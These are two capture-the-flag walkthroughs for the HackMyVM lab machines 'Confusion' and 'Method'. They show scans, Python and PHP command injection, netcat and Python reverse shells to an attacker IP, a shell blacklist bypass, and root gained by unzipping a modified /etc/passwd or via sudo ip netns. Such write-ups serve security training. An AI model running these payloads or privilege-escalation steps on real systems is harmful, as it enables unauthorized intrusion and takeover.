HackMyVm Confusion Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Confusion

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log    
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 15:59 CST
 Nmap scan report for 192.168.56.100
 Host is up (0.0040s latency).
 Not shown: 65533 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 32145/tcp open  unknown
 | fingerprint-strings:
 |   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, NULL, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
 |     Welcome To The My Magic World
 |     many times you want to ping?:
 ...

Use nc to connect port 32145.

 ~ nc 192.168.56.100 32145                
 Welcome To The My Magic World

 How many times you want to ping?: 2
 PING localhost(localhost (::1)) 56 data bytes
 64 bytes from localhost (::1): icmp_seq=1 ttl=64 time=0.086 ms
 64 bytes from localhost (::1): icmp_seq=2 ttl=64 time=0.035 ms

If we input some invalid number, we will get error msg.

 ~ nc 192.168.56.100 32145                  
 Welcome To The My Magic World

 How many times you want to ping?: 12;
 Traceback (most recent call last):
   File "/opt/ping.py", line 7, in <module>
     no_of_packets = int(input("How many times you want to ping?: "))
   File "<string>", line 1
     12;
       ^
 SyntaxError: unexpected EOF while parsing
 ^C⏎                                          

If we input some evil code, we can make it run.

```bash
~ nc 192.168.56.100 32145
Welcome To The My Magic World

How many times you want to ping?: import("os").system("id")
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
PING localhost(localhost (::1)) 56 data bytes

So we can get reverse shell.

 ```bash
~ nc 192.168.56.100 32145      
 Welcome To The My Magic World

 How many times you want to ping?: __import__("os").system("nc 192.168.56.150 1234 -e /bin/bash")
 ──────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234                          
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:39196.
 id  
 uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)

Spawn an interactive shell.

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
iamroot@confusion:/$ id
id
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
iamroot@confusion:/$

Upload id_rsa.pub to get ssh login as iamroot.

 ```bash
iamroot@confusion:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys

We found 3 users, and check sudo -l.

```bash
iamroot@confusion:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 Oct 25 08:44 .
drwxr-xr-x 18 root root 4096 Oct 25 06:02 ..
drwxr-xr-x 2 iamroot iamroot 4096 Oct 25 15:16 iamroot
drwxr-xr-x 3 sammy sammy 4096 Oct 25 14:56 sammy
drwxr-xr-x 2 still still 4096 Oct 25 14:56 still
iamroot@confusion:/home$ sudo -l
sudo -l
Matching Defaults entries for iamroot on confusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User iamroot may run the following commands on confusion:
(!root) NOPASSWD: /bin/bash

But no matter what I input, still need input password.

Then we check the ssh login msg of user still.

 ```bash
~ ssh still@192.168.56.100  
 Have you ever thought?
      If
  Cindrella's
    Shoe Fit
   Perfectly
    Then Why
   Did It Fall
     Off?
 still:confused?
 Then go for Port 32145 :)

The default shell has been modified for still.

 iamroot@confusion:/home$ cat /etc/passwd
 ...
 still:x:1001:1001::/home/still:/home/still/SoMuchConfusion

We can check the source code of /home/still/SoMuchConfusion.

```bash
iamroot@confusion:/home$ su still
Password:
Welcome To My Secret Most Secure Shell :p
cat /home/still/SoMuchConfusion

!/bin/bash echo "Welcome To My Secret Most Secure Shell :p" read secure_shell if [[ $secure_shell == "id" ]] then echo "uid=0(root) gid=0(root) groups=0(root)" elif [[ $secure_shell == "whoami" ]] then echo "root" elif [[ $secure_shell =

= "python3" ]] then echo `$secure_shell` elif [[ $secure_shell =~ ^nc || $secure_shell =~ ^bash || $secure_shell =~ ^python* ]] then echo "Smooooooth Hehe :p" elif [[ -z $secure_shell ]] then echo "Bye-Bye" else echo `$secure_shell` com
mand not found fi command not found

So we need to bypass the blacklist to get a shell as user still. Here I choose /usr/bin/dash.

 ```bash
iamroot@confusion:/home$ su still
 Password:
 Welcome To My Secret Most Secure Shell :p
 /usr/bin/dash -i
 $ nc 192.168.56.150 1234 -e /bin/bash
 ───────────────────────────────────────────────────
 ~ nc -nlvp 1234      
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:39226.
 id
 uid=1001(still) gid=1001(still) groups=1001(still)

Spawn interactive shell again, and check sudo -l.

```bash
still@confusion:~$ sudo -l
sudo -l
Matching Defaults entries for still on confusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User still may run the following commands on confusion:
(sammy) NOPASSWD: /usr/bin/python3 /opt/password.py

Run it, we get an encrypted string.

 ```bash
still@confusion:~$ sudo -u sammy /usr/bin/python3 /opt/password.py
 sudo -u sammy /usr/bin/python3 /opt/password.py
 QWJCYXJQbmFQZW5weFpsQ25mZmpiZXEK

Try to decrypt it with ROT13. Then we can login as user sammy.

 ~ ssh sammy@192.168.56.100    ...
 sammy@192.168.56.100's password:
 sammy@confusion:~$ id
 uid=1000(sammy) gid=1000(sammy) groups=1000(sammy),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)

Check sudo -l.

```bash
sammy@confusion:~$ sudo -l
Matching Defaults entries for sammy on confusion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sammy may run the following commands on confusion:
(root) NOPASSWD: /usr/bin/unzip

Then we can modify /etc/passwd, zip it, and unzip it back to /etc.

```bash
 sammy@confusion:~$ cp /etc/passwd ./
 sammy@confusion:~$ openssl passwd 123
 fpjdFvRQf46EA
 sammy@confusion:~$ echo "root2:fpjdFvRQf46EA:0:0:root:/root:/bin/bash" >> passwd
 sammy@confusion:~$ zip passwd.zip passwd
   adding: passwd (deflated 63%)
 sammy@confusion:~$ sudo unzip passwd.zip -d /etc
 Archive:  passwd.zip
   inflating: /etc/etc/passwd        
 replace /etc/passwd? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
   inflating: /etc/passwd

Finally get root.

 sammy@confusion:~$ su root2
 Password:
 root@confusion:/home/sammy# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 confusion

HackMyVm Method Walkthrough

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.0025s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
 |   256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
 |_  256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Test Page for the Nginx HTTP Server on Fedora
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80, remember to enable .htm ext.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .htm,.html,.php,.txt,.php.bak,.bak,.zip -b
401,403,404,500 --wildcard -o 80.log --exclude-length 3690

/index.htm (Status: 200) [Size: 344]
/note.txt (Status: 200) [Size: 23]
/secret.php (Status: 302) [Size: 0]
[--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]```;

Check source code of index.htm.

```bash
~ curl http://192.168.56.100/index.htm fish-0 | 0 [09:45:55]
<h1>It's Hacking Time</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="640">
<img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640">
<form action="/secret.php" hidden="true" method="GET">
<input type="text" name="HackMyVM" value="" maxlength="100"><br>
<input type="submit" value="Submit">
</form>

With the hint from index.htm, we can call secret.php with param HackMyVM.

 ```bash
~ curl 'http://192.168.56.100/secret.php?HackMyVM=id'  
 Now the main part what it is loooooool<br>Try other method⏎

Seem get method is no correct. Let's try post method.

```bash
~ curl 'http://192.168.56.100/secret.php'; -d 'HackMyVM=id'
You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>⏎

Then we can get reverse shell.

 ```bash
~ curl 'http://192.168.56.100/secret.php' -d 'HackMyVM=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'
 ──────────────────────────────────────────────────────────────────────────────────

 & kali @ mykali in ~/Documents/method 0 [10:05:51]
 ~ nc -nvlp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:45958.
 bash: cannot set terminal process group (333): Inappropriate ioctl for device
 bash: no job control in this shell
 www-data@method:~/html$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 www-data@method:~/html$

Check source code of secret.php

```bash
www-data@method:~/html$ cat secret.php
cat secret.php
<?php
...
else {
header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg";);
}
$ok="prakasaka:th3-!llum!n@t0r";
?>

Escalate to user prakasaka.

 ```bash
www-data@method:~/html$ su prakasaka
 su prakasaka
 Password: th3-!llum!n@t0r
 id
 uid=1000(prakasaka) gid=1000(prakasaka) groups=1000(prakasaka),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)

Log in ssh as user prakasaka, check sudo -l.

```bash
prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
(!root) NOPASSWD: /bin/bash
(root) /bin/ip

We can get root.

 ```bash
prakasaka@method:~$ sudo ip netns add foo
 prakasaka@method:~$ sudo ip netns exec foo /bin/sh

 # id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 method